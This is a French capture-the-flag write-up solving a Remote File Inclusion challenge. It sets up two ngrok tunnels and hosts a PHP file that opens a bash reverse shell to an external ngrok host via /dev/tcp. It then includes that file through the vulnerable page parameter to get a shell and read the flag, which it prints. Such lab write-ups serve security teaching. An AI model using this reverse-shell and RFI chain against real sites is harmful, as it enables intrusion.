Remote File Inclusion (RFI)
Consignes
Le flag se trouve à la racine du site web (/var/www/html) !
Réalisation
Après une connexion au site, nous nous retrouvons dans URL particulier. Un test similaire à celui effectué lors du challenge Local File Inclusion (LFI) Base64 est alors effectué en se rendant sur le lien suivant pour tester le RFI : http://ctfd-0.int.ecole2600.com:20676/index.php?page=https://google.com
Ce lien nous montre la page de https://google.com
On sait sur RFI permet d'inclure un fichier se trouvant sur un serveur distant. Le but va donc être d'injecter notre propre fichier afin de récupérer le FLAG.
Pour ce challenge, on a choisi de réaliser un reverse shell pour avoir un accès via un invite de commande (+ stylé non ? 😎)
Pour se faire, étant donné que nous avons la version gratuite de ngrok, nous ne pouvons lancer que une seule session à la fois, ne nous permettant pas de réaliser à la fois une écoute sur le port 4444 pour réaliser la connexion à distance et un accès sur le port 8000 que nous utiliserons pour exposer notre shell sur Internet et y accéder via le site cible.
Pour palier ceci, nous devons modifier le fichier ~/.config/ngrok/ngrok.yml en y ajoutant les éléments suivants :
tunnels:
tcp:
addr: 4444
proto: tcp
http:
addr: 8000
proto: httpLe but ici est de mettre en place 2 tunnels que nous allons lancer en même temps pour ne lancer que une session avec 2 adresses différentes pour l'écoute et le partage de notre reverse shell.
Une fois le fichier modifié et sauvegardé, nous pouvons exécuter dans un autre terminal notre ngrok avec les 2 ports renseignés dans le fichier précédent :
ngrok start --all
ngrok (Ctrl+C to quit)
🫶 Using ngrok for OSS? Request a community license: https://ngrok.com/r/oss
Session Status online
Account xxxxxxxxxxx@gmail.com (Plan: Free)
Update update available (version 3.22.1, Ctrl-U to update)
Version 3.21.0
Region Europe (eu)
Latency 22ms
Web Interface http://127.0.0.1:4040
Forwarding tcp://2.tcp.eu.ngrok.io:13380 -> localhost:4444
Forwarding https://2d42-176-189-21-212.ngrok-free.app -> http://localhost:8000
Connections ttl opn rt1 rt5 p50 p90
4 0 0.00 0.00 0.00 459.91 Nous pouvons bien observer la création de 2 liens sur les ports 4444 et 8000.
Il nous faut maintenant créer notre reverse shell. Pour se faire, créer le fichier shell.php qui est lié à notre port d'écoute 4444 :
<?php
shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13380 0>&1'");
?>Maintenant, exécuter dans un nouveau terminal la commande suivante pour écouter le port 4444 :
$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444Exécuter en paralèlle, dans le répertoire du fichier shell.php, la commande python permettant d'accéder au shell :
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...Une fois tout ceci prêt, accéder via le site cible à notre fichier shell.php en utilisant le lien ngrok sur le port 8000 :
http://ctfd-link.com:20676/index.php?page=https://2d42-176-189-21-212.ngrok-free.app/shell.phpUne fois l'accès à ce lien effectué, un reverse shell est bien établi sur notre page utilisant netcat :
$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from ::1.
Ncat: Connection from ::1:59044.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@c23adb78bacd:/var/www/html$Une fois la connexion établie, on observe que l'on se trouve à la racine du site WEB, on peut alors affiché le FLAG :
www-data@c23adb78bacd:/var/www/html$ ls
css
flag.txt
index.php
www-data@c23adb78bacd:/var/www/html$ cat flag.txt
2600{Z85LM5ZhVkfme3Ejuu0PXw}Voici donc le FLAG :
2600{Z85LM5ZhVkfme3Ejuu0PXw}Last updated